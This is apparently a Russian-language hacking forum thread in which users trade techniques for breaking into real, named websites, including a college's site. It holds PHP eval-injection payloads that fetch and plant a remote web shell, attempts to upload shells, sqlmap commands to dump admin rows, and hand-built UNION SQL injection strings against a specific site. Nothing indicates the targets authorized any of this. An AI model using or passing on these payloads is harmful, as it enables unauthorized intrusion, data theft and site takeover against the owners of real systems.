кавычки в eval можно обойти такой конструкцией: copy($_POST[a],$_POST)&a=http://site/shell.txt&b=shell.php
Warning: copy() [function.copy]: Unable to access in /hosting/htdocs/as/kernel/insert.inc.php(570) : eval()'d code on line 1 Недостаточно прав? Давайте тогда уж рассматривать ситуацию с file_get_contents, там хоть более менее знакомо всё, хоть конфиги почитать получится. name={${eval(stripslashes(file_get_contents($_POST[ev])))}}&ev=http://site/shell.txt не проходит, код шелла без <?php ?>, то есть всё, вроде, кошерно
Эт понятно, но любая база данных представляет собой набор файлов, расположенных в определенной директории. Из вашего утверждения следует, что на основании предоставленных мной данных невозможно узнать расположение файлов базы данных и их имена? Какую еще информацию нужно для этого получить? Спасибо
rogatiy А не проще, выложить УРЛ или отписать кому-то в ПМ, что бы помогли, а не играть тут в игру "сделайте, то не зная, что где и как" на 5 страниц темы! т.к. того, что Вы предоставили может не хватать и что бы узнать, что конкретно не дает Вам добиться полноценного шелла на сайте, зачем людей заставлять играть в угадайку: "а может так, получиться, а так не пробовали..."
Здравствуйте. В поисках уязвимостей на сайте учебного заведения наткнулся на вот такой баг. _http://www.sibcol.ru/system/download/ Как я понял с помощью этого даонлодэра можно залить шелл. Вопрос в том куда в итоге попадают загруженные файлы? В корне и в этой самой дирректории залитые файлы не находятся.
Игра есть такая. "Прятки" называется. Вот когда ты находишь подобную форму для аплоада - ты невольно подписываешься на её участие. И каждый раз итоговая папка может быть спрятана хз где... З.Ы. У тебя кроме раскрытия путей, вроде бы, ничего полезного сделать нельзя.
Дело в том что и на закрытые страницы которые указаны в robots.txt по адресу _http://www.sibcol.ru/system/sophos/IDES/ я не могу попасть... Есть ли способ отследить загрузку файла?
какую загрузку?? таф функция file_get_contents ты моксимум чо сможешь сделать это профитать исходники файлов на сервере
Ну для начало не помешало бы ознакомиться с тематикой раздела и понять какого рода сдесь посты выкладываются...
Help Парни, прошу помощи крутил его по разному, и не пойму есть уязвимость или ее никак не разколоть?
вопрос где именно в php nuke находится адрес сайта? пролез в бд соседнего сервера, а адрес найти не могу
как в sqlmap использовать конструкцию "where"? допустим я хочу сдампить те строки где type=admin в гугле нашел только, дамп определенной колонки: python sqlmap.py -u http://site.com --dump -T member -C type
Сделайте интерактивный SQL Shell и работайте через него и уже там указывайте выборку и условия. python sqlmap.py --url="http://site.com" --sql-shell
Не понимаю, как раскрутить скулю. Code: http://www.rstomat.ru/qwe.php?id=14'+UNION+SELECT+1,2,3,4,+--+ Менял пробелы, менял цифры, а ошибка одна и та же. Так же и с GROUP BY и ORDER BY. Хавжи раскручивает скулю на раз, а мне интересно научится руками. Что я делаю не правильно? Спасибо за разъяснения.
Спасибо. Теперь проблема в том, чтобы получить названия таблиц. Code: http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+limit+4,1+--+ Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее.. Как получить нужные таблицы? PS. пробелы в слове information не удаляются в сообщении. В юрл-строке их нету.